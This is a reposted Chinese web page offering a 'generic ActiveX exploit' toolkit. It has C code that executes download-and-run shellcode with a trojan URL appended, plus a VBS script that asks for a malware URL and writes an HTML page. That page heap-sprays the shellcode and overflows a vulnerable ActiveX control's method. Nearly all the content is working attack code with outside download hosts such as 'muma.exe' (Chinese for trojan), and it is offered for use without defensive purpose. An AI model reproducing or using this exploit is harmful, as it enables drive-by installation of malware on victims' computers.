ActiveX漏洞通用Exploit vbs修正版

2019-10-26 18:00:43

字体：大中小

来源：转载

供稿：网友

C++代码
复制代码代码如下:

#include <stdio.h>
#include <string.h>

unsigned char shellcode[] =
"/xEB/x54/x8B/x75/x3C/x8B/x74/x35/x78/x03/xF5/x56/x8B/x76/x20/x03"
"/xF5/x33/xC9/x49/x41/xAD/x33/xDB/x36/x0F/xBE/x14/x28/x38/xF2/x74"
"/x08/xC1/xCB/x0D/x03/xDA/x40/xEB/xEF/x3B/xDF/x75/xE7/x5E/x8B/x5E"
"/x24/x03/xDD/x66/x8B/x0C/x4B/x8B/x5E/x1C/x03/xDD/x8B/x04/x8B/x03"
"/xC5/xC3/x75/x72/x6C/x6D/x6F/x6E/x2E/x64/x6C/x6C/x00/x43/x3A/x5C"
"/x55/x2e/x65/x78/x65/x00/x33/xC0/x64/x03/x40/x30/x78/x0C/x8B/x40"
"/x0C/x8B/x70/x1C/xAD/x8B/x40/x08/xEB/x09/x8B/x40/x34/x8D/x40/x7C"
"/x8B/x40/x3C/x95/xBF/x8E/x4E/x0E/xEC/xE8/x84/xFF/xFF/xFF/x83/xEC"
"/x04/x83/x2C/x24/x3C/xFF/xD0/x95/x50/xBF/x36/x1A/x2F/x70/xE8/x6F"
"/xFF/xFF/xFF/x8B/x54/x24/xFC/x8D/x52/xBA/x33/xDB/x53/x53/x52/xEB"
"/x24/x53/xFF/xD0/x5D/xBF/x98/xFE/x8A/x0E/xE8/x53/xFF/xFF/xFF/x83"
"/xEC/x04/x83/x2C/x24/x62/xFF/xD0/xBF/x7E/xD8/xE2/x73/xE8/x40/xFF"
"/xFF/xFF/x52/xFF/xD0/xE8/xD7/xFF/xFF/xFF"
"http://fenggou.net/muma.exe";

int main()
{
void (* code)(); //把ShellCode转换成一个参数为空，返回为空的函数指针，并调用
* (int *) & code = shellcode;
code();
}

vbs代码
复制代码代码如下:

exeurl = InputBox( "Please input you want down&exec url：", "输入","http://jb51.net/muma.exe" )
if exeurl <> "" then
code="/xEB/x54/x8B/x75/x3C/x8B/x74/x35/x78/x03/xF5/x56/x8B/x76/x20/x03/xF5/x33/xC9/x49/x41/xAD/x33/xDB/x36/x0F/xBE/x14/x28/x38/xF2/x74/x08/xC1/xCB/x0D/x03/xDA/x40/xEB/xEF/x3B/xDF/x75/xE7/x5E/x8B/x5E/x24/x03/xDD/x66/x8B/x0C/x4B/x8B/x5E/x1C/x03/xDD/x8B/x04/x8B/x03/xC5/xC3/x75/x72/x6C/x6D/x6F/x6E/x2E/x64/x6C/x6C/x00/x43/x3A/x5C/x55/x2e/x65/x78/x65/x00/x33/xC0/x64/x03/x40/x30/x78/x0C/x8B/x40/x0C/x8B/x70/x1C/xAD/x8B/x40/x08/xEB/x09/x8B/x40/x34/x8D/x40/x7C/x8B/x40/x3C/x95/xBF/x8E/x4E/x0E/xEC/xE8/x84/xFF/xFF/xFF/x83/xEC/x04/x83/x2C/x24/x3C/xFF/xD0/x95/x50/xBF/x36/x1A/x2F/x70/xE8/x6F/xFF/xFF/xFF/x8B/x54/x24/xFC/x8D/x52/xBA/x33/xDB/x53/x53/x52/xEB/x24/x53/xFF/xD0/x5D/xBF/x98/xFE/x8A/x0E/xE8/x53/xFF/xFF/xFF/x83/xEC/x04/x83/x2C/x24/x62/xFF/xD0/xBF/x7E/xD8/xE2/x73/xE8/x40/xFF/xFF/xFF/x52/xFF/xD0/xE8/xD7/xFF/xFF/xFF"&Unicode(exeurl&Chr(00)&Chr(00))
Function Unicode(str1)
Dim str,temp
str = ""
For i=1 to len(str1)
temp = Hex(AscW(Mid(str1,i,1)))
If len(temp) < 5 Then temp = right("0000"&temp, 2)
str = str & "/x" & temp
Next
Unicode = str
End Function
function replaceregex(str)
set regex=new regExp
regex.pattern="//x(..)//x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function
set fso=createObject("scripting.filesystemobject")
if fso.FileExists("jb51.htm") then
fso.deleteFile "jb51.htm",True
end If
set fileS=fso.opentextfile("jb51.htm",8,true)
fileS.writeline "<html>"
fileS.writeline "<title>Sina</title>"
fileS.writeline "<object classid=""clsid:8EF2A07C-6E69-4144-96AA-2247D892A73D"" id='target'></object>"
fileS.writeline "<body>"
fileS.writeline "<SCRIPT language=""JavaScript"">"
fileS.writeline "var shellcode = unescape("""&replaceregex(code)&""");"
fileS.writeline "var bigblock = unescape(""%u9090%u9090"");"
fileS.writeline "var headersize = 20;"
fileS.writeline "var slackspace = headersize+shellcode.length;"
fileS.writeline "while (bigblock.length<slackspace) bigblock+=bigblock;"
fileS.writeline "fillblock = bigblock.substring(0, slackspace);"
fileS.writeline "block = bigblock.substring(0, bigblock.length-slackspace);"
fileS.writeline "while(block.length+slackspace<0x40000) block = block+block+fillblock;"
fileS.writeline "memory = new Array();"
fileS.writeline "for (x=0; x<300; x++) memory[x] = block +shellcode;"
fileS.writeline "var buffer = '';"
fileS.writeline "while (buffer.length < 218) buffer+='/x0a/x0a/x0a/x0a';"
fileS.writeline "target.Method1(buffer);"
fileS.writeline "</script>"
fileS.writeline "</body>"
fileS.writeline "</html>"
files.Close
Set fso=nothing
end if

上一篇：非常棒的lcx写的非常规运行vbs

下一篇：vbs中的LoadPicture函数示例

发表评论

共有条评论